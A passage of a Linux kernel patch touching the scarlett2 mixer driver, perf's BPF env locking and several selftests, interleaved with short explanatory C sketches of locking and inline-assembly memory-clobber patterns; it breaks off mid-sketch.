+ 	struct usb_mixer_interface *mixer = elem->head.mixer;
+ 	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-	int line_out_count =
+-		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
+-	int index = elem->control;
++	int index = line_out_remap(private, elem->control);
+ 	int oval, val, err = 0;
+ 
+-	if (index < line_out_count)
+-		index = line_out_remap(private, index);
+-
+ 	mutex_lock(&private->data_mutex);
+ 
+ 	oval = private->mux[index];
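
Every scarlett2 *_ctl_get() above now follows one template: take data_mutex, refresh the cached state if it is flagged stale, propagate a refresh failure to the caller instead of returning stale data as success, and release the mutex on every path. The template in isolation, with a stand-in cache:

#include <pthread.h>

static pthread_mutex_t data_mutex = PTHREAD_MUTEX_INITIALIZER;
static int cached, stale = 1;

static int update_cache(void)
{
	cached = 42;	/* stand-in for a device read that may fail */
	stale = 0;
	return 0;
}

static int ctl_get(long *out)
{
	int err = 0;

	pthread_mutex_lock(&data_mutex);

	if (stale) {
		err = update_cache();
		if (err < 0)
			goto unlock;
	}
	*out = cached;

unlock:
	pthread_mutex_unlock(&data_mutex);
	return err;
}
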
+diff --git a/tools/include/uapi/linux/bpf.h b/tools/include/uapi/linux/bpf.h
+index 92dbe89dafbf5..201dc77ebbd77 100644
+--- a/tools/include/uapi/linux/bpf.h
++++ b/tools/include/uapi/linux/bpf.h
+@@ -4353,6 +4353,8 @@ union bpf_attr {
+  * long bpf_get_task_stack(struct task_struct *task, void *buf, u32 size, u64 flags)
+  *	Description
+  *		Return a user or a kernel stack in bpf program provided buffer.
++ *		Note: the user stack will only be populated if the *task* is
++ *		the current task; all other tasks will return -EOPNOTSUPP.
+  *		To achieve this, the helper needs *task*, which is a valid
+  *		pointer to **struct task_struct**. To store the stacktrace, the
+  *		bpf program provides *buf* with a nonnegative *size*.
+@@ -4364,6 +4366,7 @@ union bpf_attr {
+  *
+  *		**BPF_F_USER_STACK**
+  *			Collect a user space stack instead of a kernel stack.
++ *			The *task* must be the current task.
+  *		**BPF_F_USER_BUILD_ID**
+  *			Collect buildid+offset instead of ips for user stack,
+  *			only valid if **BPF_F_USER_STACK** is also specified.
+diff --git a/tools/lib/api/io.h b/tools/lib/api/io.h
+index 777c20f6b6047..458acd294237d 100644
+--- a/tools/lib/api/io.h
++++ b/tools/lib/api/io.h
+@@ -9,6 +9,7 @@
+ 
+ #include <stdlib.h>
+ #include <unistd.h>
++#include <linux/types.h>
+ 
+ struct io {
+ 	/* File descriptor being read/ */
+diff --git a/tools/perf/util/bpf-event.c b/tools/perf/util/bpf-event.c
+index cc7c1f90cf629..91c7bfa82a50a 100644
+--- a/tools/perf/util/bpf-event.c
++++ b/tools/perf/util/bpf-event.c
+@@ -606,9 +606,9 @@ int evlist__add_bpf_sb_event(struct evlist *evlist, struct perf_env *env)
+ 	return evlist__add_sb_event(evlist, &attr, bpf_event__sb_cb, env);
+ }
+ 
+-void bpf_event__print_bpf_prog_info(struct bpf_prog_info *info,
+-				    struct perf_env *env,
+-				    FILE *fp)
++void __bpf_event__print_bpf_prog_info(struct bpf_prog_info *info,
++				      struct perf_env *env,
++				      FILE *fp)
+ {
+ 	__u32 *prog_lens = (__u32 *)(uintptr_t)(info->jited_func_lens);
+ 	__u64 *prog_addrs = (__u64 *)(uintptr_t)(info->jited_ksyms);
+@@ -624,7 +624,7 @@ void bpf_event__print_bpf_prog_info(struct bpf_prog_info *info,
+ 	if (info->btf_id) {
+ 		struct btf_node *node;
+ 
+-		node = perf_env__find_btf(env, info->btf_id);
++		node = __perf_env__find_btf(env, info->btf_id);
+ 		if (node)
+ 			btf = btf__new((__u8 *)(node->data),
+ 				       node->data_size);
+diff --git a/tools/perf/util/bpf-event.h b/tools/perf/util/bpf-event.h
+index 1bcbd4fb6c669..e2f0420905f59 100644
+--- a/tools/perf/util/bpf-event.h
++++ b/tools/perf/util/bpf-event.h
+@@ -33,9 +33,9 @@ struct btf_node {
+ int machine__process_bpf(struct machine *machine, union perf_event *event,
+ 			 struct perf_sample *sample);
+ int evlist__add_bpf_sb_event(struct evlist *evlist, struct perf_env *env);
+-void bpf_event__print_bpf_prog_info(struct bpf_prog_info *info,
+-				    struct perf_env *env,
+-				    FILE *fp);
++void __bpf_event__print_bpf_prog_info(struct bpf_prog_info *info,
++				      struct perf_env *env,
++				      FILE *fp);
+ #else
+ static inline int machine__process_bpf(struct machine *machine __maybe_unused,
+ 				       union perf_event *event __maybe_unused,
+@@ -50,9 +50,9 @@ static inline int evlist__add_bpf_sb_event(struct evlist *evlist __maybe_unused,
+ 	return 0;
+ }
+ 
+-static inline void bpf_event__print_bpf_prog_info(struct bpf_prog_info *info __maybe_unused,
+-						  struct perf_env *env __maybe_unused,
+-						  FILE *fp __maybe_unused)
++static inline void __bpf_event__print_bpf_prog_info(struct bpf_prog_info *info __maybe_unused,
++						    struct perf_env *env __maybe_unused,
++						    FILE *fp __maybe_unused)
+ {
+ 
+ }
+diff --git a/tools/perf/util/env.c b/tools/perf/util/env.c
+index 5b8cf6a421a49..5d878bae7d9a5 100644
+--- a/tools/perf/util/env.c
++++ b/tools/perf/util/env.c
+@@ -21,13 +21,19 @@ struct perf_env perf_env;
+ 
+ void perf_env__insert_bpf_prog_info(struct perf_env *env,
+ 				    struct bpf_prog_info_node *info_node)
++{
++	down_write(&env->bpf_progs.lock);
++	__perf_env__insert_bpf_prog_info(env, info_node);
++	up_write(&env->bpf_progs.lock);
++}
++
++void __perf_env__insert_bpf_prog_info(struct perf_env *env, struct bpf_prog_info_node *info_node)
+ {
+ 	__u32 prog_id = info_node->info_linear->info.id;
+ 	struct bpf_prog_info_node *node;
+ 	struct rb_node *parent = NULL;
+ 	struct rb_node **p;
+ 
+-	down_write(&env->bpf_progs.lock);
+ 	p = &env->bpf_progs.infos.rb_node;
+ 
+ 	while (*p != NULL) {
+@@ -39,15 +45,13 @@ void perf_env__insert_bpf_prog_info(struct perf_env *env,
+ 			p = &(*p)->rb_right;
+ 		} else {
+ 			pr_debug("duplicated bpf prog info %u\n", prog_id);
+-			goto out;
++			return;
+ 		}
+ 	}
+ 
+ 	rb_link_node(&info_node->rb_node, parent, p);
+ 	rb_insert_color(&info_node->rb_node, &env->bpf_progs.infos);
+ 	env->bpf_progs.infos_cnt++;
+-out:
+-	up_write(&env->bpf_progs.lock);
+ }
+ 
+ struct bpf_prog_info_node *perf_env__find_bpf_prog_info(struct perf_env *env,
+@@ -76,14 +80,22 @@ out:
+ }
+ 
+ bool perf_env__insert_btf(struct perf_env *env, struct btf_node *btf_node)
++{
++	bool ret;
++
++	down_write(&env->bpf_progs.lock);
++	ret = __perf_env__insert_btf(env, btf_node);
++	up_write(&env->bpf_progs.lock);
++	return ret;
++}
++
++bool __perf_env__insert_btf(struct perf_env *env, struct btf_node *btf_node)
+ {
+ 	struct rb_node *parent = NULL;
+ 	__u32 btf_id = btf_node->id;
+ 	struct btf_node *node;
+ 	struct rb_node **p;
+-	bool ret = true;
+ 
+-	down_write(&env->bpf_progs.lock);
+ 	p = &env->bpf_progs.btfs.rb_node;
+ 
+ 	while (*p != NULL) {
+@@ -95,25 +107,31 @@ bool perf_env__insert_btf(struct perf_env *env, struct btf_node *btf_node)
+ 			p = &(*p)->rb_right;
+ 		} else {
+ 			pr_debug("duplicated btf %u\n", btf_id);
+-			ret = false;
+-			goto out;
++			return false;
+ 		}
+ 	}
+ 
+ 	rb_link_node(&btf_node->rb_node, parent, p);
+ 	rb_insert_color(&btf_node->rb_node, &env->bpf_progs.btfs);
+ 	env->bpf_progs.btfs_cnt++;
+-out:
+-	up_write(&env->bpf_progs.lock);
+-	return ret;
++	return true;
+ }
+ 
+ struct btf_node *perf_env__find_btf(struct perf_env *env, __u32 btf_id)
++{
++	struct btf_node *res;
++
++	down_read(&env->bpf_progs.lock);
++	res = __perf_env__find_btf(env, btf_id);
++	up_read(&env->bpf_progs.lock);
++	return res;
++}
++
++struct btf_node *__perf_env__find_btf(struct perf_env *env, __u32 btf_id)
+ {
+ 	struct btf_node *node = NULL;
+ 	struct rb_node *n;
+ 
+-	down_read(&env->bpf_progs.lock);
+ 	n = env->bpf_progs.btfs.rb_node;
+ 
+ 	while (n) {
+@@ -123,13 +141,9 @@ struct btf_node *perf_env__find_btf(struct perf_env *env, __u32 btf_id)
+ 		else if (btf_id > node->id)
+ 			n = n->rb_right;
+ 		else
+-			goto out;
++			return node;
+ 	}
+-	node = NULL;
+-
+-out:
+-	up_read(&env->bpf_progs.lock);
+-	return node;
++	return NULL;
+ }
+ 
+ /* purge data in bpf_progs.infos tree */
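
The perf env changes above are a standard lock split: each helper gains a double-underscored variant that assumes bpf_progs.lock is already held, and the public name becomes a thin wrapper that takes the lock around it. Callers that already hold the lock, like the header-feature readers later in this patch, switch to the __ variants. The shape of it:

#include <pthread.h>

static pthread_rwlock_t bpf_progs_lock = PTHREAD_RWLOCK_INITIALIZER;
static int tree;	/* stand-in for the rb-tree of BTF/prog nodes */

static int __find_node(int id)	/* caller holds bpf_progs_lock */
{
	return tree == id;
}

static int find_node(int id)
{
	int res;

	pthread_rwlock_rdlock(&bpf_progs_lock);
	res = __find_node(id);
	pthread_rwlock_unlock(&bpf_progs_lock);
	return res;
}
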
+diff --git a/tools/perf/util/env.h b/tools/perf/util/env.h
+index 4566c51f2fd95..359eff51cb85b 100644
+--- a/tools/perf/util/env.h
++++ b/tools/perf/util/env.h
+@@ -164,12 +164,16 @@ const char *perf_env__raw_arch(struct perf_env *env);
+ int perf_env__nr_cpus_avail(struct perf_env *env);
+ 
+ void perf_env__init(struct perf_env *env);
++void __perf_env__insert_bpf_prog_info(struct perf_env *env,
++				      struct bpf_prog_info_node *info_node);
+ void perf_env__insert_bpf_prog_info(struct perf_env *env,
+ 				    struct bpf_prog_info_node *info_node);
+ struct bpf_prog_info_node *perf_env__find_bpf_prog_info(struct perf_env *env,
+ 							__u32 prog_id);
+ bool perf_env__insert_btf(struct perf_env *env, struct btf_node *btf_node);
++bool __perf_env__insert_btf(struct perf_env *env, struct btf_node *btf_node);
+ struct btf_node *perf_env__find_btf(struct perf_env *env, __u32 btf_id);
++struct btf_node *__perf_env__find_btf(struct perf_env *env, __u32 btf_id);
+ 
+ int perf_env__numa_node(struct perf_env *env, struct perf_cpu cpu);
+ char *perf_env__find_pmu_cap(struct perf_env *env, const char *pmu_name,
+diff --git a/tools/perf/util/genelf.c b/tools/perf/util/genelf.c
+index fefc72066c4e8..ac17a3cb59dc0 100644
+--- a/tools/perf/util/genelf.c
++++ b/tools/perf/util/genelf.c
+@@ -293,9 +293,9 @@ jit_write_elf(int fd, uint64_t load_addr, const char *sym,
+ 	 */
+ 	phdr = elf_newphdr(e, 1);
+ 	phdr[0].p_type = PT_LOAD;
+-	phdr[0].p_offset = 0;
+-	phdr[0].p_vaddr = 0;
+-	phdr[0].p_paddr = 0;
++	phdr[0].p_offset = GEN_ELF_TEXT_OFFSET;
++	phdr[0].p_vaddr = GEN_ELF_TEXT_OFFSET;
++	phdr[0].p_paddr = GEN_ELF_TEXT_OFFSET;
+ 	phdr[0].p_filesz = csize;
+ 	phdr[0].p_memsz = csize;
+ 	phdr[0].p_flags = PF_X | PF_R;
+diff --git a/tools/perf/util/header.c b/tools/perf/util/header.c
+index 9e2dce70b1300..b2b0293567f07 100644
+--- a/tools/perf/util/header.c
++++ b/tools/perf/util/header.c
+@@ -1809,8 +1809,8 @@ static void print_bpf_prog_info(struct feat_fd *ff, FILE *fp)
+ 		node = rb_entry(next, struct bpf_prog_info_node, rb_node);
+ 		next = rb_next(&node->rb_node);
+ 
+-		bpf_event__print_bpf_prog_info(&node->info_linear->info,
+-					       env, fp);
++		__bpf_event__print_bpf_prog_info(&node->info_linear->info,
++						 env, fp);
+ 	}
+ 
+ 	up_read(&env->bpf_progs.lock);
+@@ -3136,7 +3136,7 @@ static int process_bpf_prog_info(struct feat_fd *ff, void *data __maybe_unused)
+ 		/* after reading from file, translate offset to address */
+ 		bpil_offs_to_addr(info_linear);
+ 		info_node->info_linear = info_linear;
+-		perf_env__insert_bpf_prog_info(env, info_node);
++		__perf_env__insert_bpf_prog_info(env, info_node);
+ 	}
+ 
+ 	up_write(&env->bpf_progs.lock);
+@@ -3183,7 +3183,7 @@ static int process_bpf_btf(struct feat_fd *ff, void *data __maybe_unused)
+ 		if (__do_read(ff, node->data, data_size))
+ 			goto out;
+ 
+-		perf_env__insert_btf(env, node);
++		__perf_env__insert_btf(env, node);
+ 		node = NULL;
+ 	}
+ 
+@@ -4314,9 +4314,10 @@ size_t perf_event__fprintf_event_update(union perf_event *event, FILE *fp)
+ 		ret += fprintf(fp, "... ");
+ 
+ 		map = cpu_map__new_data(&ev->cpus.cpus);
+-		if (map)
++		if (map) {
+ 			ret += cpu_map__fprintf(map, fp);
+-		else
++			perf_cpu_map__put(map);
++		} else
+ 			ret += fprintf(fp, "failed to get cpus\n");
+ 		break;
+ 	default:
+diff --git a/tools/perf/util/hisi-ptt.c b/tools/perf/util/hisi-ptt.c
+index 45b614bb73bfa..764d660d30e2f 100644
+--- a/tools/perf/util/hisi-ptt.c
++++ b/tools/perf/util/hisi-ptt.c
+@@ -121,6 +121,7 @@ static int hisi_ptt_process_auxtrace_event(struct perf_session *session,
+ 	if (dump_trace)
+ 		hisi_ptt_dump_event(ptt, data, size);
+ 
++	free(data);
+ 	return 0;
+ }
+ 
+diff --git a/tools/testing/selftests/alsa/mixer-test.c b/tools/testing/selftests/alsa/mixer-test.c
+index 37da902545a41..9ad39db32d144 100644
+--- a/tools/testing/selftests/alsa/mixer-test.c
++++ b/tools/testing/selftests/alsa/mixer-test.c
+@@ -205,7 +205,7 @@ static void find_controls(void)
+ 		err = snd_ctl_poll_descriptors(card_data->handle,
+ 					       &card_data->pollfd, 1);
+ 		if (err != 1) {
+-			ksft_exit_fail_msg("snd_ctl_poll_descriptors() failed for %d\n",
++			ksft_exit_fail_msg("snd_ctl_poll_descriptors() failed for card %d: %d\n",
+ 				       card, err);
+ 		}
+ 
+@@ -358,7 +358,7 @@ static bool ctl_value_index_valid(struct ctl_data *ctl,
+ 		}
+ 
+ 		if (int64_val > snd_ctl_elem_info_get_max64(ctl->info)) {
+-			ksft_print_msg("%s.%d value %lld more than maximum %lld\n",
++			ksft_print_msg("%s.%d value %lld more than maximum %ld\n",
+ 				       ctl->name, index, int64_val,
+ 				       snd_ctl_elem_info_get_max(ctl->info));
+ 			return false;
+diff --git a/tools/testing/selftests/bpf/prog_tests/bpf_iter.c b/tools/testing/selftests/bpf/prog_tests/bpf_iter.c
+index ecde236047fe1..0c67a4e28effa 100644
+--- a/tools/testing/selftests/bpf/prog_tests/bpf_iter.c
++++ b/tools/testing/selftests/bpf/prog_tests/bpf_iter.c
+@@ -338,6 +338,8 @@ static void test_task_stack(void)
+ 	do_dummy_read(skel->progs.dump_task_stack);
+ 	do_dummy_read(skel->progs.get_task_user_stacks);
+ 
++	ASSERT_EQ(skel->bss->num_user_stacks, 1, "num_user_stacks");
++
+ 	bpf_iter_task_stack__destroy(skel);
+ }
+ 
+diff --git a/tools/testing/selftests/bpf/prog_tests/time_tai.c b/tools/testing/selftests/bpf/prog_tests/time_tai.c
+index a311198236661..f45af1b0ef2c4 100644
+--- a/tools/testing/selftests/bpf/prog_tests/time_tai.c
++++ b/tools/testing/selftests/bpf/prog_tests/time_tai.c
+@@ -56,7 +56,7 @@ void test_time_tai(void)
+ 	ASSERT_NEQ(ts2, 0, "tai_ts2");
+ 
+ 	/* TAI is moving forward only */
+-	ASSERT_GT(ts2, ts1, "tai_forward");
++	ASSERT_GE(ts2, ts1, "tai_forward");
+ 
+ 	/* Check for future */
+ 	ret = clock_gettime(CLOCK_TAI, &now_tai);
+diff --git a/tools/testing/selftests/bpf/progs/bpf_iter_task_stack.c b/tools/testing/selftests/bpf/progs/bpf_iter_task_stack.c
+index f2b8167b72a84..442f4ca39fd76 100644
+--- a/tools/testing/selftests/bpf/progs/bpf_iter_task_stack.c
++++ b/tools/testing/selftests/bpf/progs/bpf_iter_task_stack.c
+@@ -35,6 +35,8 @@ int dump_task_stack(struct bpf_iter__task *ctx)
+ 	return 0;
+ }
+ 
++int num_user_stacks = 0;
++
+ SEC("iter/task")
+ int get_task_user_stacks(struct bpf_iter__task *ctx)
+ {
+@@ -51,6 +53,9 @@ int get_task_user_stacks(struct bpf_iter__task *ctx)
+ 	if (res <= 0)
+ 		return 0;
+ 
++	/* Only one task, the current one, should succeed */
++	++num_user_stacks;
++
+ 	buf_sz += res;
+ 
+ 	/* If the verifier doesn't refine bpf_get_task_stack res, and instead
+diff --git a/tools/testing/selftests/bpf/progs/xdp_synproxy_kern.c b/tools/testing/selftests/bpf/progs/xdp_synproxy_kern.c
+index 736686e903f6a..26bfbc73d1298 100644
+--- a/tools/testing/selftests/bpf/progs/xdp_synproxy_kern.c
++++ b/tools/testing/selftests/bpf/progs/xdp_synproxy_kern.c
+@@ -447,13 +447,13 @@ static __always_inline int tcp_lookup(void *ctx, struct header_pointers *hdr, bo
+ 		unsigned long status = ct->status;
+ 
+ 		bpf_ct_release(ct);
+-		if (status & IPS_CONFIRMED_BIT)
++		if (status & IPS_CONFIRMED)
+ 			return XDP_PASS;
+ 	} else if (ct_lookup_opts.error != -ENOENT) {
+ 		return XDP_ABORTED;
+ 	}
+ 
+-	/* error == -ENOENT || !(status & IPS_CONFIRMED_BIT) */
++	/* error == -ENOENT || !(status & IPS_CONFIRMED) */
+ 	return XDP_TX;
+ }
+ 
+diff --git a/tools/testing/selftests/drivers/net/mlxsw/qos_pfc.sh b/tools/testing/selftests/drivers/net/mlxsw/qos_pfc.sh
+index f9858e221996c..6a3002fbcf43a 100755
+--- a/tools/testing/selftests/drivers/net/mlxsw/qos_pfc.sh
++++ b/tools/testing/selftests/drivers/net/mlxsw/qos_pfc.sh
+@@ -121,6 +121,9 @@ h2_destroy()
+ 
+ switch_create()
+ {
++	local lanes_swp4
++	local pg1_size
++
+ 	# pools
+ 	# -----
+ 
+@@ -230,7 +233,20 @@ switch_create()
+ 	dcb pfc set dev $swp4 prio-pfc all:off 1:on
+ 	# PG0 will get autoconfigured to Xoff, give PG1 arbitrarily 100K, which
+ 	# is (-2*MTU) about 80K of delay provision.
+-	dcb buffer set dev $swp4 buffer-size all:0 1:$_100KB
++	pg1_size=$_100KB
++
++	setup_wait_dev_with_timeout $swp4
++
++	lanes_swp4=$(ethtool $swp4 | grep 'Lanes:')
++	lanes_swp4=${lanes_swp4#*"Lanes: "}
++
++	# 8-lane ports use two buffers among which the configured buffer
++	# is split, so double the size to get twice (20K + 80K).
++	if [[ $lanes_swp4 -eq 8 ]]; then
++		pg1_size=$((pg1_size * 2))
++	fi
++
++	dcb buffer set dev $swp4 buffer-size all:0 1:$pg1_size
+ 
+ 	# bridges
+ 	# -------
+diff --git a/tools/testing/selftests/drivers/net/mlxsw/spectrum-2/tc_flower.sh b/tools/testing/selftests/drivers/net/mlxsw/spectrum-2/tc_flower.sh
+index fb850e0ec8375..7bf56ea161e35 100755
+--- a/tools/testing/selftests/drivers/net/mlxsw/spectrum-2/tc_flower.sh
++++ b/tools/testing/selftests/drivers/net/mlxsw/spectrum-2/tc_flower.sh
+@@ -10,7 +10,8 @@ lib_dir=$(dirname $0)/../../../../net/forwarding
+ ALL_TESTS="single_mask_test identical_filters_test two_masks_test \
+ 	multiple_masks_test ctcam_edge_cases_test delta_simple_test \
+ 	delta_two_masks_one_key_test delta_simple_rehash_test \
+-	bloom_simple_test bloom_complex_test bloom_delta_test"
++	bloom_simple_test bloom_complex_test bloom_delta_test \
++	max_erp_entries_test"
+ NUM_NETIFS=2
+ source $lib_dir/lib.sh
+ source $lib_dir/tc_common.sh
+@@ -983,6 +984,55 @@ bloom_delta_test()
+ 	log_test "bloom delta test ($tcflags)"
+ }
+ 
++max_erp_entries_test()
++{
++	# The number of eRP entries is limited. Once the maximum number of eRPs
++	# has been reached, filters cannot be added. This test verifies that
++	# when this limit is reached, inserstion fails without crashing.
++	# when this limit is reached, insertion fails without crashing.
++	RET=0
++
++	local num_masks=32
++	local num_regions=15
++	local chain_failed
++	local mask_failed
++	local ret
++
++	if [[ "$tcflags" != "skip_sw" ]]; then
++		return 0;
++	fi
++
++	for ((i=1; i < $num_regions; i++)); do
++		for ((j=$num_masks; j >= 0; j--)); do
++			tc filter add dev $h2 ingress chain $i protocol ip \
++				pref $i	handle $j flower $tcflags \
++				dst_ip 192.1.0.0/$j &> /dev/null
++			ret=$?
++
++			if [ $ret -ne 0 ]; then
++				chain_failed=$i
++				mask_failed=$j
++				break 2
++			fi
++		done
++	done
++
++	# We expect to exceed the maximum number of eRP entries, so that
++	# insertion eventually fails. Otherwise, the test should be adjusted to
++	# add more filters.
++	check_fail $ret "expected to exceed number of eRP entries"
++
++	for ((; i >= 1; i--)); do
++		for ((j=0; j <= $num_masks; j++)); do
++			tc filter del dev $h2 ingress chain $i protocol ip \
++				pref $i handle $j flower &> /dev/null
++		done
++	done
++
++	log_test "max eRP entries test ($tcflags). " \
++		"max chain $chain_failed, mask $mask_failed"
++}
++
+ setup_prepare()
+ {
+ 	h1=${NETIFS[p1]}
+diff --git a/tools/testing/selftests/net/arp_ndisc_untracked_subnets.sh b/tools/testing/selftests/net/arp_ndisc_untracked_subnets.sh
+index c899b446acb62..327427ec10f56 100755
+--- a/tools/testing/selftests/net/arp_ndisc_untracked_subnets.sh
++++ b/tools/testing/selftests/net/arp_ndisc_untracked_subnets.sh
+@@ -150,7 +150,7 @@ arp_test_gratuitous() {
+ 	fi
+ 	# Supply arp_accept option to set up which sets it in sysctl
+ 	setup ${arp_accept}
+-	ip netns exec ${HOST_NS} arping -A -U ${HOST_ADDR} -c1 2>&1 >/dev/null
++	ip netns exec ${HOST_NS} arping -A -I ${HOST_INTF} -U ${HOST_ADDR} -c1 2>&1 >/dev/null
+ 
+ 	if verify_arp $1 $2; then
+ 		printf "    TEST: %-60s  [ OK ]\n" "${test_msg[*]}"
+diff --git a/tools/testing/selftests/net/fib_nexthop_multiprefix.sh b/tools/testing/selftests/net/fib_nexthop_multiprefix.sh
+index 51df5e305855a..b52d59547fc59 100755
+--- a/tools/testing/selftests/net/fib_nexthop_multiprefix.sh
++++ b/tools/testing/selftests/net/fib_nexthop_multiprefix.sh
+@@ -209,12 +209,12 @@ validate_v6_exception()
+ 		echo "Route get"
+ 		ip -netns h0 -6 ro get ${dst}
+ 		echo "Searching for:"
+-		echo "    ${dst} from :: via ${r1} dev eth0 src ${h0} .* mtu ${mtu}"
++		echo "    ${dst}.* via ${r1} dev eth0 src ${h0} .* mtu ${mtu}"
+ 		echo
+ 	fi
+ 
+ 	ip -netns h0 -6 ro get ${dst} | \
+-	grep -q "${dst} from :: via ${r1} dev eth0 src ${h0} .* mtu ${mtu}"
++	grep -q "${dst}.* via ${r1} dev eth0 src ${h0} .* mtu ${mtu}"
+ 	rc=$?
+ 
+ 	log_test $rc 0 "IPv6: host 0 to host ${i}, mtu ${mtu}"
+diff --git a/tools/testing/selftests/powerpc/math/fpu_preempt.c b/tools/testing/selftests/powerpc/math/fpu_preempt.c
+index 5235bdc8c0b11..3e5b5663d2449 100644
+--- a/tools/testing/selftests/powerpc/math/fpu_preempt.c
++++ b/tools/testing/selftests/powerpc/math/fpu_preempt.c
+@@ -37,19 +37,20 @@ __thread double darray[] = {0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0,
+ int threads_starting;
+ int running;
+ 
+-extern void preempt_fpu(double *darray, int *threads_starting, int *running);
++extern int preempt_fpu(double *darray, int *threads_starting, int *running);
+ 
+ void *preempt_fpu_c(void *p)
+ {
++	long rc;
+ 	int i;
++
+ 	srand(pthread_self());
+ 	for (i = 0; i < 21; i++)
+ 		darray[i] = rand();
+ 
+-	/* Test failed if it ever returns */
+-	preempt_fpu(darray, &threads_starting, &running);
++	rc = preempt_fpu(darray, &threads_starting, &running);
+ 
+-	return p;
++	return (void *)rc;
+ }
+ 
+ int test_preempt_fpu(void)
+diff --git a/tools/testing/selftests/powerpc/math/vmx_preempt.c b/tools/testing/selftests/powerpc/math/vmx_preempt.c
+index 6761d6ce30eca..6f7cf400c6875 100644
+--- a/tools/testing/selftests/powerpc/math/vmx_preempt.c
++++ b/tools/testing/selftests/powerpc/math/vmx_preempt.c
+@@ -37,19 +37,21 @@ __thread vector int varray[] = {{1, 2, 3, 4}, {5, 6, 7, 8}, {9, 10,11,12},
+ int threads_starting;
+ int running;
+ 
+-extern void preempt_vmx(vector int *varray, int *threads_starting, int *running);
++extern int preempt_vmx(vector int *varray, int *threads_starting, int *running);
+ 
+ void *preempt_vmx_c(void *p)
+ {
+ 	int i, j;
++	long rc;
++
+ 	srand(pthread_self());
+ 	for (i = 0; i < 12; i++)
+ 		for (j = 0; j < 4; j++)
+ 			varray[i][j] = rand();
+ 
+-	/* Test fails if it ever returns */
+-	preempt_vmx(varray, &threads_starting, &running);
+-	return p;
++	rc = preempt_vmx(varray, &threads_starting, &running);
++
++	return (void *)rc;
+ }
+ 
+ int test_preempt_vmx(void)
+diff --git a/tools/testing/selftests/sgx/Makefile b/tools/testing/selftests/sgx/Makefile
+index 75af864e07b65..04ee17d3d3947 100644
+--- a/tools/testing/selftests/sgx/Makefile
++++ b/tools/testing/selftests/sgx/Makefile
+@@ -16,9 +16,9 @@ HOST_CFLAGS := -Wall -Werror -g $(INCLUDES) -fPIC -z noexecstack
+ ENCL_CFLAGS := -Wall -Werror -static -nostdlib -nostartfiles -fPIC \
+ 	       -fno-stack-protector -mrdrnd $(INCLUDES)
+ 
++ifeq ($(CAN_BUILD_X86_64), 1)
+ TEST_CUSTOM_PROGS := $(OUTPUT)/test_sgx
+ 
+-ifeq ($(CAN_BUILD_X86_64), 1)
+ all: $(TEST_CUSTOM_PROGS) $(OUTPUT)/test_encl.elf
+ endif
+ 
+diff --git a/tools/testing/selftests/sgx/load.c b/tools/testing/selftests/sgx/load.c
+index 94bdeac1cf041..c9f658e44de6c 100644
+--- a/tools/testing/selftests/sgx/load.c
++++ b/tools/testing/selftests/sgx/load.c
+@@ -136,11 +136,11 @@ static bool encl_ioc_add_pages(struct encl *encl, struct encl_segment *seg)
+  */
+ uint64_t encl_get_entry(struct encl *encl, const char *symbol)
+ {
++	Elf64_Sym *symtab = NULL;
++	char *sym_names = NULL;
+ 	Elf64_Shdr *sections;
+-	Elf64_Sym *symtab;
+ 	Elf64_Ehdr *ehdr;
+-	char *sym_names;
+-	int num_sym;
++	int num_sym = 0;
+ 	int i;
+ 
+ 	ehdr = encl->bin;
+@@ -161,6 +161,9 @@ uint64_t encl_get_entry(struct encl *encl, const char *symbol)
+ 		}
+ 	}
+ 
++	if (!symtab || !sym_names)
++		return 0;
++
+ 	for (i = 0; i < num_sym; i++) {
+ 		Elf64_Sym *sym = &symtab[i];
+ 
+diff --git a/tools/testing/selftests/sgx/sigstruct.c b/tools/testing/selftests/sgx/sigstruct.c
+index a07896a463643..d73b29becf5b0 100644
+--- a/tools/testing/selftests/sgx/sigstruct.c
++++ b/tools/testing/selftests/sgx/sigstruct.c
+@@ -318,9 +318,9 @@ bool encl_measure(struct encl *encl)
+ 	struct sgx_sigstruct *sigstruct = &encl->sigstruct;
+ 	struct sgx_sigstruct_payload payload;
+ 	uint8_t digest[SHA256_DIGEST_LENGTH];
++	EVP_MD_CTX *ctx = NULL;
+ 	unsigned int siglen;
+ 	RSA *key = NULL;
+-	EVP_MD_CTX *ctx;
+ 	int i;
+ 
+ 	memset(sigstruct, 0, sizeof(*sigstruct));
+@@ -384,7 +384,8 @@ bool encl_measure(struct encl *encl)
+ 	return true;
+ 
+ err:
+-	EVP_MD_CTX_destroy(ctx);
++	if (ctx)
++		EVP_MD_CTX_destroy(ctx);
+ 	RSA_free(key);
+ 	return false;
+ }
+diff --git a/tools/testing/selftests/sgx/test_encl.c b/tools/testing/selftests/sgx/test_encl.c
+index c0d6397295e31..ae791df3e5a57 100644
+--- a/tools/testing/selftests/sgx/test_encl.c
++++ b/tools/testing/selftests/sgx/test_encl.c
+@@ -24,10 +24,11 @@ static void do_encl_emodpe(void *_op)
+ 	secinfo.flags = op->flags;
+ 
+ 	asm volatile(".byte 0x0f, 0x01, 0xd7"
+-				:
++				: /* no outputs */
+ 				: "a" (EMODPE),
+ 				  "b" (&secinfo),
+-				  "c" (op->epc_addr));
++				  "c" (op->epc_addr)
++				: "memory" /* read from secinfo pointer */);
+ }
+ 
+ static void do_encl_eaccept(void *_op)
+@@ -42,7 +43,8 @@ static void do_encl_eaccept(void *_op)
+ 				: "=a" (rax)
+ 				: "a" (EACCEPT),
+ 				  "b" (&secinfo),
+-				  "c" (op->epc_addr));
++				  "c" (op->epc_addr)
++				: "memory" /* read from secinfo pointer */);
+ 
+ 	op->ret = rax;
+ }
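
The two hunks above add a "memory" clobber to the ENCLU inline assembly because both leaves read through the secinfo pointer passed in %rbx; without the clobber the compiler may treat the preceding stores to secinfo as dead and reorder or drop them. A minimal stand-alone sketch of the same pattern (hypothetical names, plain x86-64 GNU C, not code from the kernel tree):

#include <stdint.h>
#include <stdio.h>

struct secinfo_like {           /* hypothetical stand-in for sgx_secinfo */
	uint64_t flags;
};

int main(void)
{
	struct secinfo_like secinfo;
	uint64_t out;

	secinfo.flags = 0x2;    /* store the asm below depends on */

	/*
	 * The asm reads *(&secinfo) through a register operand.  The
	 * "memory" clobber is what tells the compiler the asm may read
	 * (or write) memory, so the store above must be emitted before
	 * the asm and cannot be sunk past it or dropped.
	 */
	asm volatile("movq (%1), %0"
		     : "=r" (out)
		     : "r" (&secinfo)
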